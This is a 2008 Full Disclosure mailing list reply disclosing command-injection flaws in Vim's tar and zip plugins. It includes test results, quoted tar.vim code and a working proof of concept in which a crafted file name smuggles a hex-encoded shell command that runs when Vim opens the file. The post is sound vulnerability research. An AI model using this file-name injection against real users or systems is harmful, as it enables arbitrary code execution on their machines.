Full Disclosure mailing list archives
Re: Collection of Vulnerabilities in Fully Patched Vim 7.1
From: "Jan Minář" <rdancer () rdancer org>
Date: Tue, 1 Jul 2008 20:36:29 +0100
On Sat, Jun 14, 2008 at 2:09 PM, Bram Moolenaar <Bram () moolenaar net> wrote:
Jan Minar wrote:1. Summary Product : Vim -- Vi IMproved Version : Tested with 7.1.314 and 6.4 Impact : Arbitrary code execution Wherefrom: Local and remote Original : http://www.rdancer.org/vulnerablevim.html Improper quoting in some parts of Vim written in the Vim Script can lead to arbitrary code execution upon opening a crafted file.
Note that version 7.1.314, as reported in the Summary, does not have most of the reported problems. The problems in the plugins have also been fixed, this requires updating the runtime files. Information about that can be found at http://www.vim.org/runtime.php
I do apologize: as written in the advisory, the version I worked with was 7.1.298. 7.1.314 was only partly vulnerable. FWIW, I have updated the advisory at http://www.rdancer.orgvulnerablevim.html . Thanks to Bram for all the good work. 7.2a.10 with updated runtime is still vulnerable to the zipplugin attack, and an updated tarplugin attack: ------------------------------------------- -------- Test results below --------------- ------------------------------------------- filetype.vim strong : EXPLOIT FAILED weak : EXPLOIT FAILED tarplugin : EXPLOIT FAILED tarplugin.updated: VULNERABLE zipplugin : VULNERABLE xpm.vim xpm : EXPLOIT FAILED xpm2 : EXPLOIT FAILED remote : EXPLOIT FAILED gzip_vim : EXPLOIT FAILED netrw : EXPLOIT FAILED The original tarplugin exploit now produces a string of telling error messages: /bin/bash: so%: command not found tar: /home/rdancer/vuln/vim/tarplugin/sploit/foo'|sosploit/foo: Cannot open: No such file or directory tar: Error is not recoverable: exiting now /bin/bash: retu: command not found /bin/bash: bar.tar|retu|'bar.tar: command not found It's easy to see that it is still possible to execute arbitrary shell commands. $VIMRUNTIME/autoload/tar.vim of Vim 7.2a.10: 136 if tarfile =~# '\.\(gz\|tgz\)$' 137 " call Decho("1: exe silent r! gzip -d -c ".s:Escape(tarfile)." | ".g:tar_cmd." -".g:tar_browseoptions." - ") *138 exe "silent r! gzip -d -c -- ".s:Escape(tarfile)." | ".g:tar_cmd." -".g:tar_browseoptions." - " 139 elseif tarfile =~# '\.lrp' 140 " call Decho("2: exe silent r! cat -- ".s:Escape(tarfile)."|gzip -d -c -|".g:tar_cmd." -".g:tar_browseoptions." - ") *141 exe "silent r! cat -- ".s:Escape(tarfile)."|gzip -d -c -|".g:tar_cmd." -".g:tar_browseoptions." - " 142 elseif tarfile =~# '\.bz2$' 143 " call Decho("3: exe silent r! bzip2 -d -c ".s:Escape(tarfile)." | ".g:tar_cmd." -".g:tar_browseoptions." - ") *144 exe "silent r! bzip2 -d -c -- ".s:Escape(tarfile)." | ".g:tar_cmd." -".g:tar_browseoptions." - " 145 else 146 " call Decho("4: exe silent r! ".g:tar_cmd." -".g:tar_browseoptions." ".s:Escape(tarfile)) **147 exe "silent r! ".g:tar_cmd." -".g:tar_browseoptions." ".s:Escape(tarfile) [...] 444 fun s:Escape(name) 445 " shellescape() was added by patch 7.0.111 446 if exists("*shellescape") 447 let qnameq= shellescape(a:name) 448 else 449 let qnameq= g:tar_shq . a:name . g:tar_shq 450 endif 451 return qnameq 452 endfun (*) s:Escape() does not suffice, as it fails to escape ``%'' and friends. (**) tar(1) allows arbitrary command execution via options ``--to-command'', and ``--use-compress-program''. The updated tarplugin attack is rather simple: $ rm -rf ./* $ touch "foo%;eval eval \`echo 0:64617465203e2070776e6564 | xxd -r\`;'bar.tar" $ vim +:q ./foo* $ ls -l pwned -rw-r--r-- 1 rdancer users 29 2008-07-01 20:18 pwned Cheers, Jan Minar. _______________________________________________ Full-Disclosure - We believe in it. Charter: http://lists.grok.org.uk/full-disclosure-charter.html Hosted and sponsored by Secunia - http://secunia.com/
Current thread:
- Re: Collection of Vulnerabilities in Fully Patched Vim 7.1 Jan Minář (Jul 01)